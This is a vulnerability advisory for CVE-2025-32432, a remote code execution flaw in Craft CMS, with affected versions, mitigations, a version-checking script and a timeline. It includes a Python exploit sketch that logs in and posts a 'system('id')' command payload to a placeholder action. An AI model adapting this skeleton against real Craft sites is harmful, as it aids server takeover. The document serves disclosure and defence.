Craft CMS is a flexible content management system for building custom websites and other digital experiences. From version 3.0.0-RC1 before 3.9.15, from 4.0.0-RC1 before 4.14.15, and from 5.0.0-RC1 before 5.6.17, Craft is vulnerable to a high-impact, low-complexity remote code execution (RCE) attack tracked as CVE-2025-32432. The issue is fixed in versions 3.9.15, 4.14.15 and 5.6.17; the fix is a supplementary fix for CVE-2023-41892, an earlier RCE in Craft, so installations that only carry the CVE-2023-41892 patch remain affected.

The following Python snippet sketches the shape of such an exploit. It is illustrative only: the "remote_code_execution" action it posts to is a placeholder, not a real Craft controller action, and it does not reproduce the actual vulnerable request.

import requests

# Placeholder values; the target and credentials are illustrative.
TARGET_URL = "http://target_site.com/craft"
USERNAME = "your_username"
PASSWORD = "your_password"

# A Session keeps the cookies returned by the login response for later requests.
session = requests.Session()

# Step 1: log in through Craft's real users/login controller action.
# Craft enables CSRF protection by default, so on a real install this POST
# would also need a valid CSRF token in the form data.
login_payload = {
    "action": "users/login",
    "loginName": USERNAME,
    "password": PASSWORD,
}
login_response = session.post(TARGET_URL, data=login_payload)
login_response.raise_for_status()

# Step 2: deliver the payload. "remote_code_execution" is not a real Craft
# action; it stands in for the vulnerable functionality without reproducing it.
rce_payload = {
    "action": "remote_code_execution",
    "payload": r"system('id')",
}
rce_response = session.post(TARGET_URL, data=rce_payload)
print(rce_response.text)

For more information on this specific vulnerability, consult the following references:

1. CVE record for CVE-2025-32432 (https://www.cve.org/CVERecord?id=CVE-2025-32432)
2. National Vulnerability Database (NVD) entry for CVE-2025-32432 (https://nvd.nist.gov/vuln/detail/CVE-2025-32432)
3. Craft CMS GitHub Security Advisory for CVE-2025-32432

Exploit Details

This vulnerability lets an attacker execute arbitrary code on the server that hosts Craft. The advisory's CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, score 10.0) requires no privileges and no user interaction, so the bug is reachable by an unauthenticated attacker over the network; the login step in the snippet above is not a precondition of the vulnerability, and valid credentials or a separate authentication bypass are not needed. Because this is a supplementary fix for CVE-2023-41892, the root cause is the same class of problem: attacker-controlled request data reaching Craft's object-configuration handling, where it decides what gets instantiated and executed. Once that happens the attacker controls the web server process and everything it can reach, including the database credentials, the filesystem and the application's security key.

Mitigations

Craft CMS has released patches for this vulnerability in versions 3.9.15, 4.14.15 and 5.6.17. Upgrade craftcms/cms to the patched release on your line (or any later release) immediately, for example with composer update craftcms/cms, and confirm the installed version afterwards with composer show craftcms/cms. Do not assume an installation is safe because it already received the CVE-2023-41892 fix: the affected ranges above include those versions. If a site ran an affected version while exposed to the internet, treat it as potentially compromised, review web server and Craft logs for unexpected POST requests to controller actions from unauthenticated clients, and rotate secrets the web process could read.
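The first step in the upgrade decision is knowing whether the deployed craftcms/cms version falls inside one of the three affected ranges. The following script is an added example, not code from the original page or from the Craft project: it encodes the advisory's ranges (3.0.0-RC1 before 3.9.15, 4.0.0-RC1 before 4.14.15, 5.0.0-RC1 before 5.6.17), orders pre-release tags such as RC1 before the final release with the same numbers, and reads the version out of a composer.lock. The composer.lock fragment it checks is constructed for the example and does not come from any real site.

```python
import json
import re

# Affected ranges from the Craft CMS advisory for CVE-2025-32432: each major
# line is vulnerable from its first release candidate up to, but not
# including, the patched release.
PATCHED = {3: (3, 9, 15), 4: (4, 14, 15), 5: (5, 6, 17)}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.]+))?$")


def parse_version(version):
    """Turn '5.6.16', 'v4.14.15' or '3.0.0-RC1' into a comparable tuple.

    The fourth element orders pre-releases (RC, beta, alpha) before the final
    release with the same numbers, so 5.6.17-RC1 sorts below 5.6.17.
    Non-semver strings such as 'dev-main' are rejected rather than guessed at.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Craft version string: {version!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch), 0 if pre else 1)


def is_vulnerable(version):
    """True if this craftcms/cms version falls inside an affected range."""
    parsed = parse_version(version)
    patched = PATCHED.get(parsed[0])
    if patched is None:
        return False  # 2.x and 6.x are outside the advisory's ranges
    # Anything below the final patched release, including a pre-release of
    # the patched version itself, is still affected.
    return parsed < patched + (1,)


def check_composer_lock(lock_text):
    """Return (version, vulnerable) for craftcms/cms in a composer.lock."""
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []):
        if pkg.get("name") == "craftcms/cms":
            version = pkg["version"]
            return version, is_vulnerable(version)
    raise LookupError("craftcms/cms not present in composer.lock")


# Constructed sample: a minimal composer.lock fragment, not from a real site.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "craftcms/cms", "version": "5.6.16"},
        {"name": "yiisoft/yii2", "version": "2.0.51"},
    ]
})

if __name__ == "__main__":
    version, vulnerable = check_composer_lock(SAMPLE_LOCK)
    status = "VULNERABLE, upgrade" if vulnerable else "patched"
    print(f"craftcms/cms {version}: {status}")
```

On a real deployment, pass the contents of the project's composer.lock to check_composer_lock; a version string the regex does not recognise (for example a dev branch alias) raises ValueError instead of silently reporting the site as safe.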

Conclusion

CVE-2025-32432 is a critical, unauthenticated remote code execution vulnerability in Craft CMS, and the releases that fix it (3.9.15, 4.14.15 and 5.6.17) are essential security updates. Keep Craft CMS on a patched version, watch logs for unexpected requests to controller actions, and treat any exposed installation that ran an affected version as a candidate for compromise review rather than assuming it was never targeted.

Timeline

Published on: 04/25/2025 15:15:36 UTC
Last modified on: 04/25/2025 20:15:39 UTC